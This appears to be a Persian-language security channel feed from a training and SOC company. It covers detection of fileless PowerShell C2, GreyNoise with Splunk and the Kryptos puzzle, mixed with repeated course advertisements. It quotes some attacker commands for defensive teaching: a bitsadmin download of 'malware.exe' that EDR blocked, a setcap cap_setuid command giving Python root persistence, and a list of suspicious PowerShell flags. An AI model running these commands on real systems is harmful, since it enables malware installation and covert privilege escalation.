شکار تهدیدات پیشرفته: روشهای شناسایی چارچوبهای C2 مبتنی بر PowerShell در حافظه
مقدمه: چالش حملات بدون فایل (Fileless Attacks)
در سناریوهای پس از نفوذ (Post-Exploitation)، مهاجمان حرفهای برای حفظ کنترل پایدار و پنهان بر روی سیستمهای قربانی، از چارچوبهای فرمان و کنترل (C2) پیشرفتهای مانند PowerShell Empire و Covenant استفاده میکنند. ویژگی اصلی این ابزارها، اجرای کدها مستقیماً در حافظه (Memory-Resident Execution) است. این تکنیک به مهاجم اجازه میدهد تا اسکریپتهای مخرب PowerShell را بدون ایجاد هیچ فایلی روی دیسک اجرا کند و در نتیجه، از دید بسیاری از آنتیویروسهای سنتی که بر اسکن فایلها متمرکز هستند، پنهان بماند.
مهاجم معمولاً با استفاده از دستوراتی مانند Invoke-Expression (IEX) یا پارامتر -EncodedCommand، اسکریپتهای خود را رمزگذاری (Encode) کرده و از طریق کانالهای ارتباطی رایج مانند HTTP، HTTPS یا SMB به سرور C2 متصل میشود. این امر باعث میشود ترافیک شبکه ظاهری کاملاً عادی داشته باشد، در حالی که در واقعیت، سیستم تحت کنترل کامل مهاجم قرار دارد.
بخش اول: تغییر رویکرد دفاعی؛ از فایل به رفتار
برای کشف این نوع فعالیتهای مخفیانه، تیمهای امنیتی باید تمرکز خود را از تحلیل «فایلهای مخرب» به سمت نظارت بر «رفتار فرآیندها و تغییرات حافظه» معطوف کنند. سرنخهای اصلی شناسایی این حملات، در خودِ فرآیندهای PowerShell و نحوه اجرای آنها نهفته است.
بخش دوم: ابزارها و تکنیکهای کلیدی برای شناسایی
۱. فعالسازی لاگهای پیشرفته PowerShell:
اولین و مهمترین گام، فعالسازی قابلیتهای ثبت لاگ داخلی PowerShell است. این قابلیتها دید عمیقی از کدهای اجراشده فراهم میکنند:
Script Block Logging (Event ID 4104): این لاگ، محتوای کامل اسکریپتهای اجراشده را ثبت میکند، حتی اگر رمزگذاری شده یا در حافظه اجرا شوند. تحلیلگران با بررسی این رویداد میتوانند کدهای مخفیشده در دستورات IEX یا -EncodedCommand را مشاهده کنند.
Module Logging (Event ID 4103): این قابلیت، جزئیات بارگذاری ماژولهای PowerShell و فراخوانی توابع مختلف را ثبت میکند که میتواند برای شناسایی رفتارهای غیرعادی مفید باشد.
۲. نظارت عمیق بر فرآیندها با Sysmon:
ابزار Sysmon (بخشی از مجموعه Sysinternals) یک ابزار قدرتمند برای نظارت بر فعالیتهای سطح سیستمعامل است. با نصب و پیکربندی صحیح Sysmon، میتوان رویدادهای حیاتی زیر را که مستقیماً به حملات PowerShell مرتبط هستند، ثبت و تحلیل کرد:
Event ID 1: Process Creation: ایجاد هر فرآیند PowerShell را به همراه پارامترهای خط فرمان آن ثبت میکند. وجود پارامترهای مشکوکی مانند -e, -enc, IEX, -nop, -w hidden یا DownloadString در این لاگ، یک نشانه خطر جدی است.
Event ID 17 & 18: Pipe Created/Connected: ابزارهایی مانند Empire برای ارتباط بین اجزای خود در داخل یک سیستم (Lateral Movement) از Named Pipe استفاده میکنند. شناسایی Pipeهایی با نامهای غیرمتعارف (مانند \\.\pipe\MSSE-*.server) میتواند نشاندهنده فعالیت C2 داخلی باشد.
Event ID 10: Process Access: این رویداد، دسترسی یک فرآیند به حافظه فرآیند دیگر را ثبت میکند. دسترسی غیرعادی یک فرآیند PowerShell یا rundll32.exe به حافظه فرآیند lsass.exe (که وظیفه مدیریت اعتبارسنجیها را بر عهده دارد)، یک نشانه قوی از تلاش برای سرقت اطلاعات هویتی با ابزارهایی مانند Mimikatz است.
بخش سوم: تحلیل دادهها و شکار تهدید (Threat Hunting)
پس از جمعآوری لاگها از منابع فوق، باید آنها را در یک پلتفرم مدیریت اطلاعات و رخدادهای امنیتی (SIEM) متمرکز کرده و تحلیل نمود. تحلیلگران میتوانند با استفاده از کوئریهای هدفمند، به شکار این تهدیدات بپردازند:
جستجوی رشتههای Base64 طولانی: دستورات -EncodedCommand از رمزگذاری Base64 استفاده میکنند. جستجوی فرآیندهای PowerShell که دارای رشتههای Base64 بسیار طولانی در خط فرمان خود هستند، یک تکنیک شکار مؤثر است.
ارتباطات شبکهای مشکوک: بررسی فرآیندهای PowerShell که ارتباطات شبکهای به خارج از سازمان برقرار میکنند، بهویژه اگر از مسیرهای غیرمعمول مانند پوشه Temp اجرا شده باشند.
تحلیل User-Agent در لاگهای پراکسی: چارچوبهای C2 معمولاً از User-Agentهای خاص یا غیرمرسومی در ارتباطات HTTP/HTTPS خود استفاده میکنند. شناسایی این الگوها در لاگهای وبپراکسی میتواند به کشف سرورهای C2 کمک کند.
ثبت نام دوره های امنیت سطح ۱ و ۲
واتس اپ 09902857290
Www.haumoun.com
مقدمه: چالش حملات بدون فایل (Fileless Attacks)
در سناریوهای پس از نفوذ (Post-Exploitation)، مهاجمان حرفهای برای حفظ کنترل پایدار و پنهان بر روی سیستمهای قربانی، از چارچوبهای فرمان و کنترل (C2) پیشرفتهای مانند PowerShell Empire و Covenant استفاده میکنند. ویژگی اصلی این ابزارها، اجرای کدها مستقیماً در حافظه (Memory-Resident Execution) است. این تکنیک به مهاجم اجازه میدهد تا اسکریپتهای مخرب PowerShell را بدون ایجاد هیچ فایلی روی دیسک اجرا کند و در نتیجه، از دید بسیاری از آنتیویروسهای سنتی که بر اسکن فایلها متمرکز هستند، پنهان بماند.
مهاجم معمولاً با استفاده از دستوراتی مانند Invoke-Expression (IEX) یا پارامتر -EncodedCommand، اسکریپتهای خود را رمزگذاری (Encode) کرده و از طریق کانالهای ارتباطی رایج مانند HTTP، HTTPS یا SMB به سرور C2 متصل میشود. این امر باعث میشود ترافیک شبکه ظاهری کاملاً عادی داشته باشد، در حالی که در واقعیت، سیستم تحت کنترل کامل مهاجم قرار دارد.
بخش اول: تغییر رویکرد دفاعی؛ از فایل به رفتار
برای کشف این نوع فعالیتهای مخفیانه، تیمهای امنیتی باید تمرکز خود را از تحلیل «فایلهای مخرب» به سمت نظارت بر «رفتار فرآیندها و تغییرات حافظه» معطوف کنند. سرنخهای اصلی شناسایی این حملات، در خودِ فرآیندهای PowerShell و نحوه اجرای آنها نهفته است.
بخش دوم: ابزارها و تکنیکهای کلیدی برای شناسایی
۱. فعالسازی لاگهای پیشرفته PowerShell:
اولین و مهمترین گام، فعالسازی قابلیتهای ثبت لاگ داخلی PowerShell است. این قابلیتها دید عمیقی از کدهای اجراشده فراهم میکنند:
Script Block Logging (Event ID 4104): این لاگ، محتوای کامل اسکریپتهای اجراشده را ثبت میکند، حتی اگر رمزگذاری شده یا در حافظه اجرا شوند. تحلیلگران با بررسی این رویداد میتوانند کدهای مخفیشده در دستورات IEX یا -EncodedCommand را مشاهده کنند.
Module Logging (Event ID 4103): این قابلیت، جزئیات بارگذاری ماژولهای PowerShell و فراخوانی توابع مختلف را ثبت میکند که میتواند برای شناسایی رفتارهای غیرعادی مفید باشد.
۲. نظارت عمیق بر فرآیندها با Sysmon:
ابزار Sysmon (بخشی از مجموعه Sysinternals) یک ابزار قدرتمند برای نظارت بر فعالیتهای سطح سیستمعامل است. با نصب و پیکربندی صحیح Sysmon، میتوان رویدادهای حیاتی زیر را که مستقیماً به حملات PowerShell مرتبط هستند، ثبت و تحلیل کرد:
Event ID 1: Process Creation: ایجاد هر فرآیند PowerShell را به همراه پارامترهای خط فرمان آن ثبت میکند. وجود پارامترهای مشکوکی مانند -e, -enc, IEX, -nop, -w hidden یا DownloadString در این لاگ، یک نشانه خطر جدی است.
Event ID 17 & 18: Pipe Created/Connected: ابزارهایی مانند Empire برای ارتباط بین اجزای خود در داخل یک سیستم (Lateral Movement) از Named Pipe استفاده میکنند. شناسایی Pipeهایی با نامهای غیرمتعارف (مانند \\.\pipe\MSSE-*.server) میتواند نشاندهنده فعالیت C2 داخلی باشد.
Event ID 10: Process Access: این رویداد، دسترسی یک فرآیند به حافظه فرآیند دیگر را ثبت میکند. دسترسی غیرعادی یک فرآیند PowerShell یا rundll32.exe به حافظه فرآیند lsass.exe (که وظیفه مدیریت اعتبارسنجیها را بر عهده دارد)، یک نشانه قوی از تلاش برای سرقت اطلاعات هویتی با ابزارهایی مانند Mimikatz است.
بخش سوم: تحلیل دادهها و شکار تهدید (Threat Hunting)
پس از جمعآوری لاگها از منابع فوق، باید آنها را در یک پلتفرم مدیریت اطلاعات و رخدادهای امنیتی (SIEM) متمرکز کرده و تحلیل نمود. تحلیلگران میتوانند با استفاده از کوئریهای هدفمند، به شکار این تهدیدات بپردازند:
جستجوی رشتههای Base64 طولانی: دستورات -EncodedCommand از رمزگذاری Base64 استفاده میکنند. جستجوی فرآیندهای PowerShell که دارای رشتههای Base64 بسیار طولانی در خط فرمان خود هستند، یک تکنیک شکار مؤثر است.
ارتباطات شبکهای مشکوک: بررسی فرآیندهای PowerShell که ارتباطات شبکهای به خارج از سازمان برقرار میکنند، بهویژه اگر از مسیرهای غیرمعمول مانند پوشه Temp اجرا شده باشند.
تحلیل User-Agent در لاگهای پراکسی: چارچوبهای C2 معمولاً از User-Agentهای خاص یا غیرمرسومی در ارتباطات HTTP/HTTPS خود استفاده میکنند. شناسایی این الگوها در لاگهای وبپراکسی میتواند به کشف سرورهای C2 کمک کند.
ثبت نام دوره های امنیت سطح ۱ و ۲
واتس اپ 09902857290
Www.haumoun.com
❤7💯3
#تجربه جدید
استفاده از فید های GrayNoise با اسپلانک
بعنوان یک فعالیت جدید تمرکزم رو روی شناخت GrayNoise بعنوان منبع هوش تهدید گذاشته ام . براتون از تجربه ام مینویسم
منبع GreyNoise Intelligence یک پلتفرم تحلیل «نویز اینترنتی» (Internet Background Noise) است که با استقرار هزاران حسگر غیرفعال در سراسر جهان، دادههای مربوط به رفتار اسکن و شناسایی سرویسها را جمعآوری و طبقهبندی میکند. ویژگی منحصربهفرد آن، تمرکز بر تحلیل رفتاری IPها بهجای صرفاً ارائهی Reputation یا امضای تهدید است. GreyNoise میتواند تشخیص دهد آیا یک IP در حال انجام فعالیت عادی (مانند اسکن خودکار موتورهای جستوجوی امنیتی) است یا درگیر رفتار مشکوک و هماهنگ برای شناسایی آسیبپذیریها.
و اما بررسی من :
در اسپلانک استفاده از GreyNoise ارزش بالایی در کاهش هشدارهای کاذب و اولویتبندی رویدادها دارد. یکی از راهکارهای عملی، ایجاد یک Lookup Job روزانه برای Noise IP Filtering هست ؛ به این معنا که Splunk بهصورت خودکار لیست IPهای شناساییشده بهعنوان “benign scanner” در GreyNoise را فراخوانی کرده و در فرایند تحلیل آلارمها، آنها را از فهرست هشدارهای واقعی حذف میکند. این اقدام باعث کاهش میانگین زمان تجزیهوتحلیل (MTTA) و تمرکز تحلیلگران بر تهدیدهای واقعی میشود.
همچنین در چارچوب Splunk SOAR ، افزودن مرحلهی “Check with GreyNoise” در Playbookهای خودکار بسیار مؤثر است. با این گام، قبل از ارجاع حادثه به لایه ۲، سامانه بهصورت خودکار اعتبار IP مظنون را از GreyNoise استعلام میگیرد؛ چنانچه IP در دستهی نویز شناختهشده باشد، Incident بهصورت خودکار کاهش یا بسته میشود و اگر رفتار آن جدید یا ناشناخته باشد، هشدار به سطح بالاتر منتقل میگردد. این مدل باعث ارتقای بازده کل SOC، کاهش حجم کار لایه ۲ و افزایش دقت تصمیمهای پاسخگویی میشود
#نشر_دانش
#انتقال_تجربه
مرکز راهبری SOC شرکت هامون
با مجوز افتا
Www.haumoun.com
ثبت نام دوره های سطح ۱ و ۲
واتس اپ 09902857290
با امکان اشتغال
استفاده از فید های GrayNoise با اسپلانک
بعنوان یک فعالیت جدید تمرکزم رو روی شناخت GrayNoise بعنوان منبع هوش تهدید گذاشته ام . براتون از تجربه ام مینویسم
منبع GreyNoise Intelligence یک پلتفرم تحلیل «نویز اینترنتی» (Internet Background Noise) است که با استقرار هزاران حسگر غیرفعال در سراسر جهان، دادههای مربوط به رفتار اسکن و شناسایی سرویسها را جمعآوری و طبقهبندی میکند. ویژگی منحصربهفرد آن، تمرکز بر تحلیل رفتاری IPها بهجای صرفاً ارائهی Reputation یا امضای تهدید است. GreyNoise میتواند تشخیص دهد آیا یک IP در حال انجام فعالیت عادی (مانند اسکن خودکار موتورهای جستوجوی امنیتی) است یا درگیر رفتار مشکوک و هماهنگ برای شناسایی آسیبپذیریها.
و اما بررسی من :
در اسپلانک استفاده از GreyNoise ارزش بالایی در کاهش هشدارهای کاذب و اولویتبندی رویدادها دارد. یکی از راهکارهای عملی، ایجاد یک Lookup Job روزانه برای Noise IP Filtering هست ؛ به این معنا که Splunk بهصورت خودکار لیست IPهای شناساییشده بهعنوان “benign scanner” در GreyNoise را فراخوانی کرده و در فرایند تحلیل آلارمها، آنها را از فهرست هشدارهای واقعی حذف میکند. این اقدام باعث کاهش میانگین زمان تجزیهوتحلیل (MTTA) و تمرکز تحلیلگران بر تهدیدهای واقعی میشود.
همچنین در چارچوب Splunk SOAR ، افزودن مرحلهی “Check with GreyNoise” در Playbookهای خودکار بسیار مؤثر است. با این گام، قبل از ارجاع حادثه به لایه ۲، سامانه بهصورت خودکار اعتبار IP مظنون را از GreyNoise استعلام میگیرد؛ چنانچه IP در دستهی نویز شناختهشده باشد، Incident بهصورت خودکار کاهش یا بسته میشود و اگر رفتار آن جدید یا ناشناخته باشد، هشدار به سطح بالاتر منتقل میگردد. این مدل باعث ارتقای بازده کل SOC، کاهش حجم کار لایه ۲ و افزایش دقت تصمیمهای پاسخگویی میشود
#نشر_دانش
#انتقال_تجربه
مرکز راهبری SOC شرکت هامون
با مجوز افتا
Www.haumoun.com
ثبت نام دوره های سطح ۱ و ۲
واتس اپ 09902857290
با امکان اشتغال
🔥5🤓1
یکی مانده به آخر !
جلسه امروز مقدمه ای بر پایان دوره دوم CISSP سال ۱۴۰۴ آکادمی روزبه و شرکت هامون بود. اما شروعی بر فردای بهتر با تحویل ۱۸ متخصص عالی امنیت به جامعه ایران و حتی سایر کشورها.
تلاش میکنم دوره ای که برگزار میکنم ممتاز باشد چون اول برای خودم ارزش قائلم و بعد به حق شرکت کنندگان احترام میگذارم
با شما خواهم بود در سومین دوره CISSP سال ۱۴۰۴ همراه با پکیج آمادگی آزمون رسمی به زبان زیبای فارسی : ثبت نام توسط واتس اپ 09902857290
Www.haumoun.com
جلسه امروز مقدمه ای بر پایان دوره دوم CISSP سال ۱۴۰۴ آکادمی روزبه و شرکت هامون بود. اما شروعی بر فردای بهتر با تحویل ۱۸ متخصص عالی امنیت به جامعه ایران و حتی سایر کشورها.
تلاش میکنم دوره ای که برگزار میکنم ممتاز باشد چون اول برای خودم ارزش قائلم و بعد به حق شرکت کنندگان احترام میگذارم
با شما خواهم بود در سومین دوره CISSP سال ۱۴۰۴ همراه با پکیج آمادگی آزمون رسمی به زبان زیبای فارسی : ثبت نام توسط واتس اپ 09902857290
Www.haumoun.com
❤7
باز شدن رمز پس از ۳۵ سال
در سال ۱۹۹۰، مجسمه “Kryptos” توسط هنرمند آمریکایی جیم سانبورن (Jim Sanborn) در محوطهٔ مرکزی سازمان سیا (CIA) نصب شد. این اثر ترکیبی از هنر و علم رمزنگاری است و از چهار بخش رمزگذاریشده تشکیل میشود که روی یک صفحهٔ مسی بزرگ حک شدهاند. هدف سانبورن آن بود که نشان دهد زیبایی در تلاقی بین رمزها، دانش، و راز نهفته است.
سه بخش اول طی سالهای دههٔ ۱۹۹۰ تا اوایل ۲۰۱۰ توسط رمزنگاران حرفهای و علاقهمندان در سراسر جهان رمزگشایی شد. این پیامها شامل تاریخچهٔ کشف مقابر مصر و ارجاعاتی به رمزنگاری کلاسیک بودند. در مقابل، بخش چهارم (K4) هرگز حل نشد و به یکی از بزرگترین معماهای رمزنگاری معاصر جهان تبدیل شد — حتی متخصصان سیا و آژانس امنیت ملی (NSA) نیز نتوانستند متن کامل آن را بازیابی کنند.
در طول سالها سانبورن چند “سرنخ” عمومی منتشر کرد، از جمله دو واژهٔ از متن رمزگشاییشده – “BERLIN” و “CLOCK” – که نشان میداد محل یا مضمون پیام احتمالاً با برلین و زمان ارتباط دارد. با وجود این، معما همچنان سربسته باقی ماند و جامعهٔ رمزنگاری آن را نمادی از مرز میان دانش انسانی و ناشناخته تلقی کرد.
در اکتبر ۲۰۲۵، سانبورن در مصاحبهای با نیویورک تایمز اعلام کرد که اکنون قصد دارد راهحل نهایی بخش چهارم Kryptos را افشا کند. او گفته است با توجه به سن بالا و گذر زمان، نمیخواهد این راز بدون توضیح از بین برود، بنابراین راهحل و مستندات اصلی طراحی آن را از طریق حراجی کریستی (Christie’s) به فروش میگذارد. این مجموعه شامل متن رمز اصلی، ترجمهٔ آشکار (Plaintext)، یادداشتهای طراحی و نسخههای اولیهٔ الگوریتم رمز است. درآمد حاصل احتمالاً به پروژههای هنری و آموزشی اهدا میشود.
افشای رمز Kryptos پس از ۳۵ سال پایانی نمادین بر یکی از طولانیترین چالشهای رمزنگاری دوران مدرن خواهد بود؛ اثری که مرز میان هنر، اطلاعات و اسرار دولتی را برای همیشه در تاریخ ثبت کرد
https://www.nytimes.com/2025/10/16/science/kryptos-cia-solution-sanborn-auction.html?unlocked_article_code=1.t08.Fb2g.wov0l-NgQKoE&smid=url-share
در سال ۱۹۹۰، مجسمه “Kryptos” توسط هنرمند آمریکایی جیم سانبورن (Jim Sanborn) در محوطهٔ مرکزی سازمان سیا (CIA) نصب شد. این اثر ترکیبی از هنر و علم رمزنگاری است و از چهار بخش رمزگذاریشده تشکیل میشود که روی یک صفحهٔ مسی بزرگ حک شدهاند. هدف سانبورن آن بود که نشان دهد زیبایی در تلاقی بین رمزها، دانش، و راز نهفته است.
سه بخش اول طی سالهای دههٔ ۱۹۹۰ تا اوایل ۲۰۱۰ توسط رمزنگاران حرفهای و علاقهمندان در سراسر جهان رمزگشایی شد. این پیامها شامل تاریخچهٔ کشف مقابر مصر و ارجاعاتی به رمزنگاری کلاسیک بودند. در مقابل، بخش چهارم (K4) هرگز حل نشد و به یکی از بزرگترین معماهای رمزنگاری معاصر جهان تبدیل شد — حتی متخصصان سیا و آژانس امنیت ملی (NSA) نیز نتوانستند متن کامل آن را بازیابی کنند.
در طول سالها سانبورن چند “سرنخ” عمومی منتشر کرد، از جمله دو واژهٔ از متن رمزگشاییشده – “BERLIN” و “CLOCK” – که نشان میداد محل یا مضمون پیام احتمالاً با برلین و زمان ارتباط دارد. با وجود این، معما همچنان سربسته باقی ماند و جامعهٔ رمزنگاری آن را نمادی از مرز میان دانش انسانی و ناشناخته تلقی کرد.
در اکتبر ۲۰۲۵، سانبورن در مصاحبهای با نیویورک تایمز اعلام کرد که اکنون قصد دارد راهحل نهایی بخش چهارم Kryptos را افشا کند. او گفته است با توجه به سن بالا و گذر زمان، نمیخواهد این راز بدون توضیح از بین برود، بنابراین راهحل و مستندات اصلی طراحی آن را از طریق حراجی کریستی (Christie’s) به فروش میگذارد. این مجموعه شامل متن رمز اصلی، ترجمهٔ آشکار (Plaintext)، یادداشتهای طراحی و نسخههای اولیهٔ الگوریتم رمز است. درآمد حاصل احتمالاً به پروژههای هنری و آموزشی اهدا میشود.
افشای رمز Kryptos پس از ۳۵ سال پایانی نمادین بر یکی از طولانیترین چالشهای رمزنگاری دوران مدرن خواهد بود؛ اثری که مرز میان هنر، اطلاعات و اسرار دولتی را برای همیشه در تاریخ ثبت کرد
https://www.nytimes.com/2025/10/16/science/kryptos-cia-solution-sanborn-auction.html?unlocked_article_code=1.t08.Fb2g.wov0l-NgQKoE&smid=url-share
Nytimes
A C.I.A. Secret Kept for 35 Years Is Found in the Smithsonian’s Vault (Gift Article)
Jim Sanborn is auctioning off the solution to Kryptos, the puzzle he sculpted for the intelligence agency’s headquarters. Two fans of the work then discovered the key.
❤5⚡2
دوره CISSP یکتا و ممتاز
برای تمام ایرانیان -آنلاین
با پکیج ویژه و یکسال منتورینگ استاد روزبه
واتس اپ 09902857290
کاملترین دوره CISSP در ایران به تایید دانشجویان
✳️✳️✳️✳️✳️✳️✳️
#آکادمی_روزبه
مرکز تخصصی CISSP
www.haumoun.com
سمینار و کارگاه عملی CISSP
مختص دانشجویان آکادمی روزبه و شرکت هامون www.haumoun.com
۸ آبانماه ۱۴۰۴ تهران
**این سمینار جزو پکیج آموزشی آمادگی آزمون CISSP است که در راستای جبران کمبود روش تدریس آنلاین و انجام کارگاه و منتورینگ و نتورکینگ اعضای کلاس های امسال؛ تشکیل میگردد
برای تمام ایرانیان -آنلاین
با پکیج ویژه و یکسال منتورینگ استاد روزبه
واتس اپ 09902857290
کاملترین دوره CISSP در ایران به تایید دانشجویان
✳️✳️✳️✳️✳️✳️✳️
#آکادمی_روزبه
مرکز تخصصی CISSP
www.haumoun.com
سمینار و کارگاه عملی CISSP
مختص دانشجویان آکادمی روزبه و شرکت هامون www.haumoun.com
۸ آبانماه ۱۴۰۴ تهران
**این سمینار جزو پکیج آموزشی آمادگی آزمون CISSP است که در راستای جبران کمبود روش تدریس آنلاین و انجام کارگاه و منتورینگ و نتورکینگ اعضای کلاس های امسال؛ تشکیل میگردد
👏4❤1
وقتی EDR خوب داشته باشی قبل از عمل؛ دستور مهاجم Kill میشه تا SOC ات سرش خلوت باشه و بتونه به کشف Zero day امیدوار باشه
این کامندیه که کیل شده
bitsadmin /transfer MyDownloadJob /download /priority NORMAL "https://lnkd.in/dAg93i59" "C:\Users\Public\Downloads\malware.exe
این کامندیه که کیل شده
bitsadmin /transfer MyDownloadJob /download /priority NORMAL "https://lnkd.in/dAg93i59" "C:\Users\Public\Downloads\malware.exe
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
💯7
تجربه
یکی از روشهای مورد استفاده مهاجمان برای این که بتوانند دسترسی root را دوباره بهدست بیاورند، استفاده از «Linux Capabilities» برای باینری Python است.
مثال :
bash
setcap cap_setuid+ep /usr/bin/python3.12
توضیح:
در لینوکس، دستور setcap به یک فایل اجرایی قابلیتهایی (Capabilities) میدهد که معمولاً فقط فایلهای با سطح دسترسی SUID دارند.
در این مثال، با فعالکردن قابلیت cap_setuid+ep برای /usr/bin/python3.12، مهاجم باعث میشود که باینری Python بتواند سطح دسترسی کاربر جاری را به root تغییر دهد (مثل setuid root بدون نیاز به SUID bit).
⚠️ پیامد امنیتی:
بدون اینکه بیت SUID را روی فایل Python تنظیم کنند یا باینری را تغییر دهند، مهاجم میتواند با استفاده از همین قابلیتها:
از طریق Python یک شِل (Shell) با دسترسی root اجرا کند.
دربپشتیهای سطح پایین و پنهان بسازد.
این تغییر سطح دسترسی ممکن است از دید ابزارهای امنیتی یا سیستمهای مانیتورینگ ساده پنهان بماند، چون فایل Python هنوز ظاهر عادی دارد.
#نشر_دانش
#آکادمی_روزبه
مرکز تخصصی CISSP
یکی از روشهای مورد استفاده مهاجمان برای این که بتوانند دسترسی root را دوباره بهدست بیاورند، استفاده از «Linux Capabilities» برای باینری Python است.
مثال :
bash
setcap cap_setuid+ep /usr/bin/python3.12
توضیح:
در لینوکس، دستور setcap به یک فایل اجرایی قابلیتهایی (Capabilities) میدهد که معمولاً فقط فایلهای با سطح دسترسی SUID دارند.
در این مثال، با فعالکردن قابلیت cap_setuid+ep برای /usr/bin/python3.12، مهاجم باعث میشود که باینری Python بتواند سطح دسترسی کاربر جاری را به root تغییر دهد (مثل setuid root بدون نیاز به SUID bit).
⚠️ پیامد امنیتی:
بدون اینکه بیت SUID را روی فایل Python تنظیم کنند یا باینری را تغییر دهند، مهاجم میتواند با استفاده از همین قابلیتها:
از طریق Python یک شِل (Shell) با دسترسی root اجرا کند.
دربپشتیهای سطح پایین و پنهان بسازد.
این تغییر سطح دسترسی ممکن است از دید ابزارهای امنیتی یا سیستمهای مانیتورینگ ساده پنهان بماند، چون فایل Python هنوز ظاهر عادی دارد.
#نشر_دانش
#آکادمی_روزبه
مرکز تخصصی CISSP
🙏4❤1
قابل توجه مسوولان
روند افزایشی را در برون سپاری خدمات IT و امنیت را شاهد هستم.
در کنار منافع ( که برخی مواقع جبر بوده ) بایستی ریسک ها را هم در نظر گرفت.
🔴لازم است مسوولان کشوری نسبت به تهیه و ابلاغ تطابق سنجی با گزارشاتی چون SOC1, 2,3 اقدام کنند تا برون سپاری ها تحت کنترل باشد وگرنه در آینده نزدیک شاهد شکست های حفاظتی شدید از سوی پیمانکاران خواهیم بود
هلدینگ ها و شرکت های مادر هم میتوانند با ابلاغ گزارشات تطابق سنجی SOC به زیر مجموعه های خود نقشی مهم در کنترل امنیت ایفا کنند
۲۷ مهرماه ۱۴۰۴ ثبت شد.
روزبه نوروزی
**گزارشات SOC از بحث مرکز عملیات امنیت جداست و مقوله ای نظارتی است.
روند افزایشی را در برون سپاری خدمات IT و امنیت را شاهد هستم.
در کنار منافع ( که برخی مواقع جبر بوده ) بایستی ریسک ها را هم در نظر گرفت.
🔴لازم است مسوولان کشوری نسبت به تهیه و ابلاغ تطابق سنجی با گزارشاتی چون SOC1, 2,3 اقدام کنند تا برون سپاری ها تحت کنترل باشد وگرنه در آینده نزدیک شاهد شکست های حفاظتی شدید از سوی پیمانکاران خواهیم بود
هلدینگ ها و شرکت های مادر هم میتوانند با ابلاغ گزارشات تطابق سنجی SOC به زیر مجموعه های خود نقشی مهم در کنترل امنیت ایفا کنند
۲۷ مهرماه ۱۴۰۴ ثبت شد.
روزبه نوروزی
**گزارشات SOC از بحث مرکز عملیات امنیت جداست و مقوله ای نظارتی است.
👌8❤3👍3
وصله شده این dMSA، درست؛ ولی BadSuccessor از attribute دیگری در همان ساختار trust chain سوءاستفاده میکند.
توجه داشته باشید
دوره های سطح ۱ و ۲
پوشش دهنده گپ های دانشی شما
https://specterops.io/blog/2025/10/20/the-near-return-of-the-king-account-takeover-using-the-badsuccessor-technique/
توجه داشته باشید
دوره های سطح ۱ و ۲
پوشش دهنده گپ های دانشی شما
https://specterops.io/blog/2025/10/20/the-near-return-of-the-king-account-takeover-using-the-badsuccessor-technique/
SpecterOps
The (Near) Return of the King: Account Takeover Using the BadSuccessor Technique - SpecterOps
After Microsoft patched Yuval Gordon’s BadSuccessor privilege escalation technique, BadSuccessor returned with another blog from Yuval, briefly mentioning to the community that attackers can still abuse dMSAs to take over any object where we have a write…
⚡3💯1
#امنیت_به_زبان_ساده
هرم درد : تمرکز بر راس هرم
تاکتیکها، تکنیکها و رویهها (TTPs) سخت و موثر
کشف TTPs بالاترین و مؤثرترین و سخت ترین سطح دفاع است. در این سطح، ما دیگر به دنبال یک فایل یا ابزار خاص نیستیم، بلکه به دنبال الگوی رفتاری مهاجم هستیم
تاکتیک (Tactic): هدف کلی مهاجم چیست؟ (مثلاً: دسترسی اولیه، ارتقای سطح دسترسی، حرکت جانبی در شبکه).
تکنیک (Technique): چگونه آن هدف را دنبال میکند؟ (مثلاً: برای دسترسی اولیه از فیشینگ استفاده میکند).
رویه (Procedure): جزئیات دقیق پیادهسازی آن تکنیک چگونه است؟ (مثلاً: ایمیل فیشینگ با یک فایل PDF آلوده که از یک آسیبپذیری خاص در Adobe Reader استفاده میکند).
برای مدافع: شناسایی TTPها نیازمند دید جامع به کل زنجیره حمله، تحلیلگران خبره و ابزارهای پیشرفته مانند SIEM و SOAR است. ما به دنبال “داستان” حمله هستیم، نه فقط یک نشانه . هم سخت است هم موثر . کشف کردن این عنصر نیاز به یک عملیات پیچیده دارد اما وقتی کشف شد هکر را خلع سلاح میکند
درد برای مهاجم: فلجکننده! وقتی ما بتوانیم TTPهای یک مهاجم را شناسایی کنیم ، در واقع کل استراتژی و کتابچه راهنمای (Playbook) او را بیاثر کردهایم.
مهاجم دیگر نمیتواند با تغییر ابزار یا IP به کار خود ادامه دهد. او باید روش فکر کردن و عمل کردن خود را از پایه تغییر دهد که این کار بسیار پرهزینه، زمانبر و گاهی غیرممکن است.
مثال: ما متوجه میشویم که مهاجم همیشه ابتدا از طریق فیشینگ وارد میشود، سپس با استفاده از PowerShell یک اسکریپت بدون فایل (Fileless) را برای حرکت جانبی اجرا میکند و در نهایت دادهها را فشرده کرده و از طریق DNS Tunneling به بیرون ارسال میکند. ما با تمرکز بر شناسایی و مسدود کردن هر یک از این رفتارها (نه فقط ابزارها)، کل عملیات او را، صرف نظر از ابزاری که استفاده میکند، مختل میکنیم.
#آکادمی_روزبه www.haumoun.com
ثبت نام دوره سطح ۱ و ۲ واتس اپ 09902857290
هرم درد : تمرکز بر راس هرم
تاکتیکها، تکنیکها و رویهها (TTPs) سخت و موثر
کشف TTPs بالاترین و مؤثرترین و سخت ترین سطح دفاع است. در این سطح، ما دیگر به دنبال یک فایل یا ابزار خاص نیستیم، بلکه به دنبال الگوی رفتاری مهاجم هستیم
تاکتیک (Tactic): هدف کلی مهاجم چیست؟ (مثلاً: دسترسی اولیه، ارتقای سطح دسترسی، حرکت جانبی در شبکه).
تکنیک (Technique): چگونه آن هدف را دنبال میکند؟ (مثلاً: برای دسترسی اولیه از فیشینگ استفاده میکند).
رویه (Procedure): جزئیات دقیق پیادهسازی آن تکنیک چگونه است؟ (مثلاً: ایمیل فیشینگ با یک فایل PDF آلوده که از یک آسیبپذیری خاص در Adobe Reader استفاده میکند).
برای مدافع: شناسایی TTPها نیازمند دید جامع به کل زنجیره حمله، تحلیلگران خبره و ابزارهای پیشرفته مانند SIEM و SOAR است. ما به دنبال “داستان” حمله هستیم، نه فقط یک نشانه . هم سخت است هم موثر . کشف کردن این عنصر نیاز به یک عملیات پیچیده دارد اما وقتی کشف شد هکر را خلع سلاح میکند
درد برای مهاجم: فلجکننده! وقتی ما بتوانیم TTPهای یک مهاجم را شناسایی کنیم ، در واقع کل استراتژی و کتابچه راهنمای (Playbook) او را بیاثر کردهایم.
